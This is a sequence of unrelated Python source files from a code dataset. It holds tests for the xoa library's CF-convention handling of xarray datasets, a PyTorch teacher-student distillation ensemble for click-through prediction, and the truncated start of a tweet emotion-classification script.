test_cf_cfspecs_format_data_var_unkown():\n da = xr.DataArray(range(5), name='foo')\n cfspecs = cf.get_cf_specs()\n\n da_fmt = cfspecs.format_data_var(da, rename=False)\n assert da_fmt.name == \"foo\"\n\n da_fmt = cfspecs.format_data_var(da, rename=True)\n assert da_fmt.name == \"foo\"\n\n\ndef test_cf_cfspecs_exclude_data_var():\n ds = xr.Dataset({\"temperature\": (\"nx\", [1, 2])})\n ds.temperature.attrs[\"standard_name\"] = \"sea_water_potential_temperature\"\n cfspecs = cf.CFSpecs(\n {\"data_vars\": {\"temp\": {\"name\": \"temperature\"}, \"ptemp\": {\"exclude\": True}}}\n )\n ds = cfspecs.decode(ds)\n assert \"temp\" in ds.data_vars\n\n\ndef test_cf_cfspecs_to_loc():\n ds = xr.Dataset(\n {\"u_t\": ((\"time\", \"y\", \"x_u\"), np.ones((1, 2, 3)))},\n coords={\n \"lon_u\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n cfspecs = cf.get_cf_specs()\n dso = cfspecs.to_loc(ds, x=False, y='v', u=None)\n assert \"x\" in dso.dims\n assert \"y_v\" in dso.dims\n assert \"u_t\" in dso\n assert \"lon_u\" in dso\n\n\ndef test_cf_cfspecs_reloc():\n ds = xr.Dataset(\n {\"u_t\": ((\"time\", \"y\", \"x_u\"), np.ones((1, 2, 3)))},\n coords={\n \"lon_u\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"lat\": ((\"y\", \"x_u\"), np.ones((2, 3))),\n \"time\": (\"time\", [1]),\n },\n )\n cfspecs = cf.get_cf_specs()\n dso = cfspecs.reloc(ds, u=False, t='u')\n assert \"x\" in dso.dims\n assert \"u_u\" in dso\n assert \"lon\" in dso\n\n\ndef test_cf_cfspecs_coords_get_axis():\n cfspecs = cf.get_cf_specs().coords\n\n # from attrs\n depth = xr.DataArray([1], dims='aa', attrs={'axis': 'z'})\n assert cfspecs.get_axis(depth) == 'Z'\n\n # from CF specs\n depth = xr.DataArray([1], dims='aa', attrs={'standard_name': 'ocean_layer_depth'})\n assert cfspecs.get_axis(depth) == 'Z'\n\n\ndef test_cf_cfspecs_coords_get_dim_type():\n cfspecs = cf.get_cf_specs().coords\n\n # from name\n assert cfspecs.get_dim_type('aa') is None\n assert cfspecs.get_dim_type('xi') == \"x\"\n\n # from a known coordinate\n coord = xr.DataArray([1], dims='aa', attrs={'standard_name': 'longitude'})\n da = xr.DataArray([1], dims='aa', coords={'aa': coord})\n assert cfspecs.get_dim_type('aa', da) == \"x\"\n\n\ndef test_cf_cfspecs_coords_get_dim_types():\n cfspecs = cf.get_cf_specs().coords\n\n aa = xr.DataArray([0, 1], dims=\"aa\", attrs={\"standard_name\": \"latitude\"})\n da = xr.DataArray(np.ones((2, 2, 2)), dims=('foo', 'aa', 'xi'), coords={'aa': aa})\n\n assert cfspecs.get_dim_types(da) == (None, 'y', 'x')\n assert cfspecs.get_dim_types(da, unknown='-') == (\"-\", 'y', 'x')\n assert cfspecs.get_dim_types(da, asdict=True) == {\"foo\": None, \"aa\": \"y\", \"xi\": \"x\"}\n\n\ndef test_cf_cfspecs_coords_search_dim():\n cfspecs = cf.get_cf_specs().coords\n\n # from name\n temp = xr.DataArray(np.arange(2 * 3).reshape(1, 2, 3), dims=('aa', 'ny', 'x'))\n assert cfspecs.search_dim(temp, 'y') == 'ny'\n assert cfspecs.search_dim(temp) is None\n\n # from explicit axis attribute\n depth = xr.DataArray([1], dims='aa', attrs={'axis': 'z'})\n temp.coords['aa'] = depth\n assert cfspecs.search_dim(temp, 'z') == 'aa'\n assert cfspecs.search_dim(temp) is None\n assert cfspecs.search_dim(depth) == {\"dim\": \"aa\", \"type\": \"z\", \"cf_name\": None}\n\n # from known coordinate\n del temp.coords['aa'].attrs['axis']\n temp.coords['aa'].attrs['standard_name'] = 'ocean_layer_depth'\n assert cfspecs.search_dim(temp, 'z') == 'aa'\n assert cfspecs.search_dim(temp, 'depth') == 'aa' # by generic name\n assert cfspecs.search_dim(temp) is None\n\n # subcoords\n level = xr.DataArray(np.arange(2), dims='level')\n depth = xr.DataArray(\n np.arange(2 * 3).reshape(2, 3),\n dims=('level', 'lon'),\n name='depth',\n coords={'level': level, 'lon': [3, 4, 5]},\n )\n assert cfspecs.search_dim(depth) == {'dim': 'level', 'cf_name': 'level', 'type': 'z'}\n assert cfspecs.search_dim(depth.level) == {'dim': 'level', 'type': 'z', 'cf_name': 'level'}\n depth = depth.rename(level='aa')\n depth.aa.attrs['axis'] = 'Z'\n assert cfspecs.search_dim(depth) == {'dim': 'aa', 'type': 'z', 'cf_name': None}\n\n # not found but only 1d and no dim_type specified\n assert cfspecs.search_dim(xr.DataArray([5], dims='bb')) == {\n 'dim': 'bb',\n 'type': None,\n 'cf_name': None,\n }\n\n\ndef test_cf_cfspecs_coords_search_from_dim():\n\n lon = xr.DataArray([1, 2], dims='lon')\n level = xr.DataArray([1, 2, 3], dims='aa', attrs={'standard_name': 'ocean_sigma_coordinate'})\n mem = xr.DataArray(range(3), dims='mem')\n temp = xr.DataArray(\n np.zeros((mem.size, level.size, lon.size)),\n dims=('mem', 'aa', 'lon'),\n coords={'mem': mem, 'aa': level, 'lon': lon},\n )\n\n cfspecs = cf.get_cf_specs().coords\n\n # Direct coordinate\n assert cfspecs.search_from_dim(temp, 'aa').name == 'aa'\n\n # Depth coordinate because the only one with this dim\n depth = xr.DataArray(\n np.ones((level.size, lon.size)), dims=('aa', 'lon'), coords={'aa': level, 'lon': lon}\n )\n temp.coords['depth'] = depth\n assert cfspecs.search_from_dim(temp, 'aa').name == 'depth'\n\n # Cannot get dim_type and we have multiple coords with this dim\n del temp.coords['aa']\n fake = xr.DataArray(np.ones((level.size, lon.size)), dims=('aa', 'lon'), coords={'lon': lon})\n temp.coords['fake'] = fake\n assert cfspecs.search_from_dim(temp, 'aa') is None\n\n # Can get dim_type back from name\n temp = temp.rename(aa='level')\n assert cfspecs.search_from_dim(temp, 'level').name == 'depth'\n\n # Nothing identifiable\n temp = xr.DataArray([3], dims='banana')\n assert cfspecs.search_from_dim(temp, \"banana\") is None\n\n\ndef test_cf_cfspecs_coords_get_dims():\n lat = xr.DataArray([4, 5], dims='yy', attrs={'units': 'degrees_north'})\n depth = xr.DataArray([4, 5], dims='level', attrs={'axis': 'Z'})\n da = xr.DataArray(\n np.ones((2, 2, 2, 2)), dims=('r', 'level', 'yy', 'xi'), coords={'level': depth, 'yy': lat}\n )\n\n cfspecs = cf.get_cf_specs().coords\n dims = cfspecs.get_dims(da, 'xyzt', allow_positional=True)\n assert dims == ('xi', 'yy', 'level', 'r')\n dims = cfspecs.get_dims(da, 'f', errors=\"ignore\")\n assert dims == (None,)\n\n\ndef test_cf_cfspecs_infer_coords():\n ds = xr.Dataset({\"temp\": (\"nx\", [1, 2]), \"lon\": (\"nx\", [4, 5])})\n ds = cf.get_cf_specs().infer_coords(ds)\n assert \"lon\" in ds.coords\n\n\ndef test_cf_cfspecs_decode_encode():\n ds = xoa.open_data_sample(\"croco.south-africa.meridional.nc\")\n cfspecs = cf.CFSpecs(xoa.get_data_sample(\"croco.cfg\"))\n\n dsc = cfspecs.decode(ds)\n assert list(dsc) == [\n 'akt',\n 'cs_r',\n 'cs_w',\n 'Vtransform',\n 'angle',\n 'el',\n 'corio',\n 'bathy',\n 'hbl',\n 'hc',\n 'mask_rho',\n 'ex',\n 'ey',\n 'sal',\n 'sc_r',\n 'sc_w',\n 'ptemp',\n 'time_step',\n 'u',\n 'v',\n 'w',\n 'xl',\n 'ssh',\n ]\n assert list(dsc.coords) == [\n 'y_rho',\n 'y_v',\n 'lat_rho',\n 'lat_u',\n 'lat_v',\n 'lon_rho',\n 'lon_u',\n 'lon_v',\n 'sig_rho',\n 'sig_w',\n 'time',\n 'x_rho',\n 'x_u',\n ]\n assert set(dsc.dims) == {'auxil', 'sig_rho', 'sig_w', 'time', 'x_rho', 'x_u', 'y_rho', 'y_v'}\n\n dse = cfspecs.encode(dsc)\n assert list(dse) == list(ds)\n assert list(dse.coords) == list(ds.coords)\n assert list(dse.dims) == list(ds.dims)\n ds.close()\n\n\ndef test_cf_dataarraycfaccessor():\n from xoa.accessors import CFDataArrayAccessor\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", xr.core.extensions.AccessorRegistrationWarning)\n xr.register_dataarray_accessor('xcf')(CFDataArrayAccessor)\n\n lon = xr.DataArray(range(5), dims='xxx', name='xxx', attrs={'standard_name': 'longitude'})\n temp = xr.DataArray(range(20, 25), dims='xxx', coords={'xxx': lon}, name='temp')\n\n assert temp.xcf.lon.name == 'xxx'\n assert temp.xcf.lat is None\n assert temp.xcf.lon.xcf.name == \"lon\"\n\n\ndef test_cf_datasetcfaccessor():\n from xoa.accessors import CFDatasetAccessor\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", xr.core.extensions.AccessorRegistrationWarning)\n xr.register_dataset_accessor('xcf')(CFDatasetAccessor)\n\n lon = xr.DataArray(range(5), dims='xxx', name='xxx', attrs={'standard_name': 'longitude'})\n temp = xr.DataArray(\n range(20, 25),\n dims='xxx',\n coords={'xxx': lon},\n name='yoyo',\n attrs={'standard_name': 'sea_water_temperature'},\n )\n\n ds = temp.to_dataset()\n assert ds.xcf.temp.name == 'yoyo'\n assert ds.xcf.sal is None\n\n\ndef test_cf_register_cf_specs():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n\n content = \"\"\"\n [register]\n name=myname\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n\n cf_specs = cf.CFSpecs(content)\n assert cf_specs.name == \"myname\"\n\n cf.register_cf_specs(cf_specs)\n assert cf_specs in cf_cache[\"registered\"]\n assert cf_specs.name == \"myname\"\n\n cf.register_cf_specs(myothername=cf_specs)\n assert cf_specs in cf_cache[\"registered\"]\n assert cf_specs.name == \"myothername\"\n\n\ndef test_cf_get_cf_specs_registered():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n content = \"\"\"\n [register]\n name=myname\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs_in = cf.CFSpecs(content)\n cf.register_cf_specs(cf_specs_in)\n\n cf_specs_out = cf.get_cf_specs(name='myname')\n assert cf_specs_out is cf_specs_in\n\n\ndef test_cf_get_cf_specs_from_encoding():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n content = \"\"\"\n [register]\n name=mynam234\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs_in = cf.CFSpecs(content)\n cf.register_cf_specs(cf_specs_in)\n\n ds = xr.Dataset(\n {\n \"mytemp\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n \"mysal\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n },\n coords={\"mylon\": np.arange(2), \"mylat\": np.arange(2)},\n )\n\n ds.encoding.update(cf_specs=\"mynam234\")\n assert cf.get_cf_specs_from_encoding(ds) is cf_specs_in\n\n ds.mytemp.encoding.update(cf_specs=\"mynam234\")\n assert cf.get_cf_specs_from_encoding(ds.mytemp) is cf_specs_in\n\n ds.mylon.encoding.update(cf_specs=\"mynam234\")\n assert cf.get_cf_specs_from_encoding(ds.mylon) is cf_specs_in\n\n assert cf.get_cf_specs_from_encoding(ds.mylat) is None\n\n\ndef test_cf_set_cf_specs_registered():\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n content = \"\"\"\n [register]\n name=myname2\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs_in = cf.CFSpecs(content)\n cf.register_cf_specs(cf_specs_in)\n\n with cf.set_cf_specs(\"myname2\") as cfspecs:\n assert cfspecs is cf_specs_in\n\n\ndef test_cf_get_cf_specs_matching_score():\n\n cf_content0 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs0 = cf.CFSpecs(cf_content0)\n cf_content1 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n [coords]\n [[lon]]\n name=mylon\n \"\"\"\n cf_specs1 = cf.CFSpecs(cf_content1)\n cf_content2 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n \"\"\"\n cf_specs2 = cf.CFSpecs(cf_content2)\n\n ds = xr.Dataset(\n {\n \"mytemp\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n \"mysal\": ([\"mylat\", \"mylon\"], np.ones((2, 2))),\n },\n coords={\"mylon\": np.arange(2), \"mylat\": np.arange(2)},\n )\n\n for cf_specs, score in [(cf_specs0, 25), (cf_specs1, 75), (cf_specs2, 50)]:\n assert cf.get_cf_specs_matching_score(ds, cf_specs) == score\n\n\ndef test_cf_infer_cf_specs():\n\n cf_content0 = \"\"\"\n [register]\n [[attrs]]\n source=\"*hycom3d*\"\n\n [data_vars]\n [[temp]]\n name=mytemp\n \"\"\"\n cf_specs0 = cf.CFSpecs(cf_content0)\n cf_content1 = \"\"\"\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n [coords]\n [[lon]]\n name=mylon\n \"\"\"\n cf_specs1 = cf.CFSpecs(cf_content1)\n cf_content2 = \"\"\"\n [register]\n name=hycom3d\n\n [data_vars]\n [[temp]]\n name=mytemp\n [[sal]]\n name=mysal\n \"\"\"\n cf_specs2 = cf.CFSpecs(cf_content2)\n\n cf_cache = cf._get_cache_()\n cf_cache[\"registered\"].clear()\n cf.register_cf_specs(cf_specs0, cf_specs1, cf_specs2)\n\n temp = xr.DataArray([1], dims=\"mylon\")\n sal = xr.DataArray([1], dims=\"mylon\")\n lon = xr.DataArray([1], dims=\"mylon\")\n\n ds = xr.Dataset({\"mytemp\": temp, \"mysal\": sal}, coords={\"mylon\": lon})\n assert cf.infer_cf_specs(ds) is cf_specs1\n\n ds.attrs.update(source=\"my hycom3d!\")\n assert cf.infer_cf_specs(ds) is cf_specs0\n\n ds.attrs.update(cf_specs=\"hycom3d\")\n assert cf.infer_cf_specs(ds) is cf_specs2\n\n\n# test_cf_cfspecs_decode_encode()\n# test_cf_cfspecs_format_data_var_loc()\n# test_cf_cfspecs_coords_get_loc_arg()\n# test_cf_cfspecs_format_obj_with_loc()\n# test_cf_cfspecs_get_loc_mapping()\n# test_cf_cfspecs_coords_search_dim()\ntest_cf_cfspecs_search_coord_with_stacking()\n\n# lon = xr.DataArray(range(5), dims=\"lon\")\n# banana = xr.DataArray(\n# lon + 20,\n# dims=\"lon\",\n# coords=[lon],\n# name=\"banana_t\",\n# attrs={\"standard_name\": \"banana\", \"taste\": \"good\"},\n# )\n# floc, fname, fattrs, out_name, out_standard_name, replace_attrs=None, \"sst_q\", {\"standard_name\": [\"potatoe\"]}, \"sst_q\", \"potatoe_at_q_location\", True\n# print(cf.SGLocator().format_dataarray(\n# banana, loc=floc, name=fname, attrs=fattrs, replace_attrs=replace_attrs\n# ))\n\n# sg = cf.SGLocator()\n# print(sg.get_loc(name=\"u_t\", attrs=dict(standard_name = None, long_name = None)))\n\n# test_cf_cfspecs_decode_encode()\n","sub_path":"xoa/tests/test_cf.py","file_name":"test_cf.py","file_ext":"py","file_size_in_byte":34797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"328731493","text":"# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append(\"../\") \nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom common import BaseNet\nfrom time import time\nfrom DeepFM.DeepFM import DeepFM\nfrom xDeepFM.xDeepFM import xDeepFM\nfrom DCN.DCN import DCN\nfrom DNN.DNN import DNN\nfrom layers import mlps\nimport numpy as np\nimport random\nimport os\nimport logging\n\nclass ensemble(nn.Module, BaseNet):\n def __init__(self, student_net, teacher_net_list=None, gamma=0.95, T=3,\n soft_label_type=\"\", use_gating=False, teacher_state_dict_list=None, pretrain_model=None,\n gating_layer=3, gating_dim=100, gating_drop=0, gating_bn=False,\n use_s_input=False, g_T=2, gate_only=False,\n s_t_dim=0, std_gamma=0, res_prob=False,\n use_rand=False, fix_teacher=True, \n std_weight=False, remove_std=0, use_kl=False,\n topk=0, both_loss=False, \n use_fixed_weight=False,\n softmax_fixed_weight=False,\n weight_prob=False,\n use_dynamic_weight=False,\n gating_bias=True,\n local=-1,\n **params):\n super().__init__()\n self.teacher_list = nn.ModuleList(teacher_net_list)\n self.teacher_state_dict_list = teacher_state_dict_list\n self.student = student_net\n self.local = local\n \n self.device = self.student.device\n self.soft_label_type = soft_label_type\n self.use_gating = use_gating\n self.gamma = gamma\n self.T = T\n self.g_T = g_T\n self.use_s_input = use_s_input\n self.gate_only = gate_only\n self.pretrain_model = pretrain_model\n self.s_t_dim = s_t_dim\n self.std_gamma = std_gamma\n self.res_prob = res_prob\n self.use_rand = use_rand\n self.std_weight = std_weight\n self.fix_teacher = fix_teacher\n self.remove_std = remove_std\n self.use_kl = use_kl\n self.topk = topk\n self.both_loss = both_loss\n self.use_fixed_weight = use_fixed_weight\n self.softmax_fixed_weight = softmax_fixed_weight\n self.weight_prob = weight_prob\n self.gating_bias = gating_bias\n\n self.use_dynamic_weight = use_dynamic_weight\n \n if self.use_fixed_weight:\n# self.fixed_weight = nn.Parameter(torch.randn(len(self.teacher_list))).to(self.device).view(-1, 1)\n self.fixed_weight_lin = nn.Linear(len(params[\"teacher_name_list\"]), 1)\n \n if self.use_dynamic_weight:\n# self.weight_lin = nn.Linear(len(params[\"teacher_name_list\"]),\n# len(params[\"teacher_name_list\"]), bias=self.gating_bias)\n self.weight_lin = mlps(input_dim=len(params[\"teacher_name_list\"]), hidden_dim=gating_dim, hidden_layer=gating_layer,\n layernorm=gating_bn, dropout_rate=gating_drop, out_dim=len(params[\"teacher_name_list\"]))\n \n if self.use_kl:\n self.course_loss_fn = nn.KLDivLoss(reduction=\"batchmean\")\n self.student.loss_fn = nn.KLDivLoss(reduction=\"batchmean\")\n else:\n self.course_loss_fn = self.student.loss_fn\n\n if self.use_gating:\n embedding_len = self.student.hidden_dim if self.use_s_input \\\n else sum([teacher.course_vec_len for teacher in self.teacher_list])\n self.gating = mlps(input_dim=embedding_len, hidden_dim=gating_dim, hidden_layer=gating_layer,\n layernorm=gating_bn, dropout_rate=gating_drop,\n out_dim=1 if self.res_prob else len(teacher_net_list))\n self.gating.apply(self.init_weights)\n\n elif std_gamma > 0:\n embedding_len = self.student.hidden_dim\n self.aux_layer = mlps(input_dim=embedding_len, hidden_dim=gating_dim, hidden_layer=gating_layer,\n layernorm=gating_bn, dropout_rate=gating_drop, out_dim=1)\n self.aux_layer.apply(self.init_weights)\n self.mse_loss = nn.MSELoss()\n \n self.load_pretrain(fix_teacher=self.fix_teacher)\n\n\n def load_pretrain(self, fix_teacher=True):\n if self.pretrain_model is not None:\n logging.info(\"Loading ensemble pretrain weights.\")\n \n try:\n self.load_weights(self.pretrain_model)\n except:\n pretrained_dict = torch.load(self.pretrain_model, map_location='cuda:0' \n if str(self.device)!=\"cpu\" else \"cpu\")\n model_dict = self.state_dict()\n# print(pretrained_dict.keys())\n# print(\"---\")\n# print(model_dict.keys())\n# print(\"---\")\n# print(pretrained_dict.keys())\n for k,v in pretrained_dict.items():\n if \"student\" not in k and k in model_dict:\n model_dict[k] = pretrained_dict[k]\n self.load_state_dict(model_dict)\n return\n else:\n logging.info(\"Teacher loading\")\n for idx, teacher in enumerate(self.teacher_list):\n teacher.load_weights(self.teacher_state_dict_list[idx])\n if fix_teacher:\n logging.info(\"Fixing teacher\")\n for teacher_model in self.teacher_list:\n for param in teacher_model.parameters():\n param.requires_grad = False\n else:\n logging.info(\"Fine tune teacher\")\n\n def cross_entropy_fn(self, prob, labels, weight=None):\n loss_vec = - (labels * torch.log(prob) + (1 - labels) * torch.log(1 - prob)) \n if weight is not None:\n loss_vec = weight * loss_vec\n loss_vec = loss_vec[loss_vec!=0]\n return loss_vec.mean()\n \n\n def check_teachers(self):\n s_logloss, s_auc = self.evaluate(self.iter_val)\n auc_list = []\n keep_list = []\n logging.info(\"S [DNN], auc: {:.5f}, logloss: {:.5f}\".format(s_auc, s_logloss))\n for idx, teacher in enumerate(self.teacher_list):\n teacher_name = teacher.__class__.__name__\n t_logloss, t_auc = teacher.evaluate(self.iter_val)\n auc_list.append(t_auc)\n if t_auc >= s_auc:\n keep_list.append(teacher)\n logging.info(\"Keep {}.\".format(teacher_name))\n else:\n logging.info(\"Drop {}.\".format(teacher_name))\n logging.info(\"T [{}], auc: {:.5f}, logloss: {:.5f}.\".format(teacher_name, t_auc, t_logloss))\n self.teacher_list = nn.ModuleList(keep_list)\n return s_logloss, s_auc\n \n def entropy_select(self, probs, logits):\n probs_dis = torch.abs(probs - 0.5)\n entropy_min_index = torch.max(probs_dis, dim=1)[1]\n return (logits[range(self.batch_size), entropy_min_index] / self.T).sigmoid().unsqueeze(1)\n \n def topk_select(self, probs, logits):\n probs_dis = torch.abs(probs - 0.5)\n topk_index = probs_dis.topk(self.topk, dim=1)[1]\n topk_logits = logits[torch.arange(self.batch_size)[:,None], topk_index]\n tpk_logits_t_avg_sig = (topk_logits/self.T).mean(dim=-1).sigmoid().unsqueeze(1)\n tpk_logits_t_sig_avg = (topk_logits/self.T).sigmoid().mean(dim=-1).unsqueeze(1)\n return tpk_logits_t_avg_sig, tpk_logits_t_sig_avg\n \n def merge_teachers(self, teacher_sig_tensor, s_input, labels=None):\n logits = teacher_sig_tensor\n probs = teacher_sig_tensor.sigmoid()\n \n# print(probs.size())\n# sys.exit()\n\n return_dict = {}\n return_dict[\"logits\"] = logits\n return_dict[\"probs\"] = probs\n return_dict[\"prob_std\"] = probs.std(dim=-1).unsqueeze(1)\n return_dict[\"logits_t_avg_sig\"] = (logits/self.T).mean(dim=-1).sigmoid().unsqueeze(1)\n return_dict[\"logits_t_sig_avg\"] = (logits/self.T).sigmoid().mean(dim=-1).unsqueeze(1)\n \n \n return_dict[\"entropy_prob\"] = self.entropy_select(probs, logits)\n if self.topk > 0:\n return_dict[\"tpk_logits_t_avg_sig\"], return_dict[\"tpk_logits_t_sig_avg\"] \\\n = self.topk_select(probs, logits)\n\n if self.use_fixed_weight:\n inp = probs if self.weight_prob else logits\n return_dict[\"fixed_weight_avg\"] = self.fixed_weight_lin(inp).sigmoid()\n \n if self.use_dynamic_weight:\n inp = probs if self.weight_prob else logits\n dynamic_weight = self.weight_lin(inp)\n if self.softmax_fixed_weight:\n dynamic_weight = dynamic_weight.softmax(dim=-1)\n \n if self.weight_prob:\n return_dict[\"dynamic_weight_avg\"] = torch.sum(probs * dynamic_weight, dim=-1).unsqueeze(1)\n else:\n return_dict[\"dynamic_weight_avg\"] = torch.sum(logits * dynamic_weight, dim=-1).unsqueeze(1).sigmoid()\n \n return_dict[\"dynamic_weight_logit_soft\"] = \\\n (torch.sum(logits * dynamic_weight, dim=-1).unsqueeze(1) / self.T).sigmoid()\n\n if self.use_rand:\n soft_logits = logits / self.T\n v_mean = soft_logits.mean(dim=-1).unsqueeze(1)\n v_var = soft_logits.std(dim=-1).unsqueeze(1)\n var_soft_label = v_mean + torch.randn(self.batch_size, 1).to(self.device) * v_var\n return_dict[\"var_soft_label\"] = var_soft_label.sigmoid()\n \n\n if self.use_gating:\n gating_inp = s_input\n\n if self.res_prob:\n prob_var = self.gating(gating_inp).squeeze()\n return_dict[\"modified_logits_t_avg_sig\"] = (prob_var + (logits / self.T).mean(dim=-1)).sigmoid().unsqueeze(1) \n return_dict[\"modified_logits_t_sig_avg\"] = (prob_var + (logits / self.T).sigmoid().mean(dim=-1)).sigmoid().unsqueeze(1)\n else:\n weight = (self.gating(gating_inp) / self.g_T).softmax(dim=-1)\n return_dict[\"logits_t_sig_w_avg\"] = (weight * (logits/self.T).sigmoid()).sum(dim=-1).unsqueeze(1)\n return_dict[\"logits_t_w_avg_sig\"] = (weight * (logits/self.T)).sum(dim=-1).sigmoid().unsqueeze(1)\n return_dict[\"gate_weight\"] = weight\n return_dict[\"gate_prob\"] = (weight * probs).sum(-1).unsqueeze(1)\n\n return return_dict\n \n\n\n def forward(self, inputs):\n if not self.local:\n Xi, Xv, y = inputs\n Xi, Xv, y = Xi.long().to(self.device), Xv.float().to(self.device), \\\n y.float().to(self.device)\n else:\n Xi, Xv, y, teacher_logits = inputs\n Xi, Xv, y, teacher_logits = Xi.long().to(self.device), Xv.float().to(self.device), \\\n y.float().to(self.device), teacher_logits.float().to(self.device)\n \n self.batch_size = y.size(0)\n \n if len(self.teacher_list) > 0 or self.local > 0:\n if self.local <= 0:\n teacher_sig_tensor = torch.cat([teacher(inputs)[\"sig_score\"] \n for teacher in self.teacher_list], dim=-1)\n else:\n teacher_sig_tensor = teacher_logits\n \n \n student_dict = self.student(inputs[0: 3])\n soft_prob = (student_dict[\"sig_score\"] / self.T).sigmoid()\n \n merged_dict = self.merge_teachers(teacher_sig_tensor, student_dict[\"learning\"], labels=y)\n \n if self.use_gating and self.gate_only:\n weight = 1 / (merged_dict[\"prob_std\"] ** 2) if self.std_weight else None\n gate_loss = self.cross_entropy_fn(merged_dict[\"gate_prob\"], y, weight=weight)\n return_dict = {\n \"loss\": gate_loss,\n \"prob\": merged_dict[self.soft_label_type]}\n return return_dict\n \n soft_label = merged_dict[self.soft_label_type] \n \n student_loss = student_dict[\"loss\"]\n \n if self.gate_only and (self.use_fixed_weight or self.use_dynamic_weight):\n loss = self.course_loss_fn(merged_dict[self.soft_label_type], y)\n return_dict = {\"loss\": loss, \"prob\": merged_dict[self.soft_label_type]}\n return return_dict\n else:\n if self.use_gating:\n course_loss = self.cross_entropy_fn(soft_prob, soft_label, weight=weight)\n else:\n if self.use_kl:\n soft_prob = soft_prob.log()\n course_loss = self.course_loss_fn(soft_prob, soft_label.detach())\n \n \n loss = (1 - self.gamma) * student_loss \\\n + self.gamma * course_loss \n \n if self.both_loss:\n loss = 0.1 * student_loss + \\\n 0.8 * self.cross_entropy_fn(soft_prob, merged_dict[\"logits_t_sig_avg\"]) + \\\n 0.1 * self.cross_entropy_fn(soft_prob, merged_dict[\"logits_t_w_avg_sig\"])\n \n # if self.std_gamma > 0:\n # student_std = self.aux_layer(student_dict[\"learning\"]).sigmoid()\n # teacher_std = merged_dict[\"probs\"].std(dim=-1).unsqueeze(1)\n # std_loss = self.student.loss_fn(student_std, teacher_std)\n # loss += self.std_gamma * std_loss\n \n return_dict = {\"loss\": loss, \"prob\": student_dict[\"prob\"]}\n return return_dict\n else:\n student_dict = self.student(inputs[0:3])\n loss = student_dict[\"loss\"]\n return_dict = {\"loss\": loss, \"prob\": student_dict[\"prob\"]}\n return return_dict\n \n \n\ndef seed_everything(seed=1029):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\nseed_everything()\n\n\nif __name__ == \"__main__\":\n xi = np.array([[1,2,3,4],[2,1,3,4],[2,1,3,2],[2,1,3,2]])\n xv = np.array([[3,1,1,1],[2,1,3,4],[2,1,3,2],[2,1,3,2]])\n y = np.array([1,0,1,1])\n \n xi = torch.LongTensor(xi)\n xv = torch.FloatTensor(xv)\n y = torch.FloatTensor(y).view(-1, 1)\n total_num_feature = 5\n feature_len = 4\n device = torch.device(\"cpu\")\n \n \n teacher = DeepFM(total_num_feature, feature_len, device, embedding_size=100)\n student = DNN(total_num_feature, feature_len, device, embedding_size=100)\n \n model = ensemble(teacher, student, share_embedding=False)\n optimizer = optim.Adam(model.parameters(), lr=3e-4)\n return_dict = model.forward([xi, xv, y])\n print(return_dict[\"loss\"])\n# return_dict[\"loss\"].backward()\n# print(model.teacher_model.Embedding_1d.weight.grad)\n \n ","sub_path":"model/Compressor/ensemble.py","file_name":"ensemble.py","file_ext":"py","file_size_in_byte":15059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"606096048","text":"# coding=utf-8\nfrom twokenize import tokenize\nimport numpy\nimport scipy\nimport sys\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import cross_validation\nfrom sklearn import svm\nfrom scipy import sparse\nimport numpy as np\nfrom nltk.corpus import wordnet as wn\n\n\n# helper function convert text file to array (one line in each array entry)\ndef file_to_array(filename):\n\tfile = open(filename)\n\tarray = np.array([])\n\tfor line in file:\n\t\tarray = np.append(array, line.rstrip())\n\tfile.close()\n\treturn array\n\n# helper function to convert label list from multilabel to binary for a given emotion\ndef to_binary_classification(classfications, emotion):\n\tbinary_class = np.array([])\n\tfor item in classfications:\n\t\tif item == emotion:\n\t\t\tbinary_class = np.append(binary_class, True)\n\t\telse:\n\t\t\tbinary_class = np.append(binary_class, False)\n\treturn binary_class\n\n# helper function to convert label list from multilabel to binary for a given emotion\ndef to_binary_classification_merged(classfications, emotion_1, emotion_2):\n\tbinary_class = np.array([])\n\tfor item in classfications:\n\t\tif (item == emotion_1) | (item == emotion_2):\n\t\t\tbinary_class = np.append(binary_class, True)\n\t\telse:\n\t\t\tbinary_class = np.append(binary_class, False)\n\treturn binary_class\n\n# returns a sklearn vectorizer for unigrams, bigrams, and trigrams\n# params: vocab (false--get vectorizer for all features, or true--get vectorizer for predefined feature list)\n#\t\t emotion (emotion to get vectorizer for, only needed if vocab=true)\ndef get_token_vectorizer(vocab=False, emotion=\"\"):\n\tif vocab:\n\t\tfilename = \"featurelists/\" + emotion + \"_tokens\"\n\t\tvocab = file_to_array(filename)\n\t\tvectorizer = CountVectorizer(ngram_range=(1,2), 